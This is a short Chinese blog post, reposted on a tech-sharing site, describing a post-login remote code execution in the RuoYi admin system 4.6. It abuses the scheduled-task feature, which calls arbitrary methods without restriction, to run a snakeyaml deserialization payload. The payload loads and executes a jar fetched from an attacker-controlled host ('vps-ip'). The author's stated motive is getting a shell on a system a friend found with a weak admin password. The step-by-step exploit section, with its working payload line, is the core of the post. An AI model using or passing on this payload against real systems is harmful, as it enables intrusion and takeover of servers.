标签：yaml 代码 E6% CMS4.6 若依 漏洞 任务 后台 RCE

0x00 前言

此漏洞源于一个朋友遇到了这个系统，后台有弱口令，问能不能shell

开始审计，先看官方文档，发现作者在文档中写明了历史漏洞，告诫了用户使用风险，还算是良心了

https://doc.ruoyi.vip/ruoyi/document/kslj.html#%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

 

 

重点是shell，且目标为当时最新版本，历史漏洞已经无法用了，由于有后台权限，搭建了系统在后台浏览了一下功能，发现存在一个任务调度的功能

 

 

根据添加调度任务的url定位到代码，最终定位到任务执行代码：

 

 

 可以看到代码无任何黑白名单限制，直接动态调用任意类任意方法

摸一下依赖有snakeyaml

 

 

便想着用artsploit攻击spring-cloud 的那一套思路（https://github.com/artsploit/yaml-payload）

 

0x01 漏洞利用

位置：系统监控->定时任务->添加任务

任务名称 :随便填 调用目标字符串：

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]')　

cron表达式: 0/50 * * * * ? （随便填） 执行策略: 执行一次 状态：正常   成功getshell

利用思路有很多，抛砖引玉了。

 

0x02 总结

漏洞未在最新4.6.1版本上试过，代码如果没改的话，理论上都是可以的。

标签：yaml,代码,E6%,CMS4.6,若依,漏洞,任务,后台,RCE
来源： https://www.cnblogs.com/r00tuser/p/14693462.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。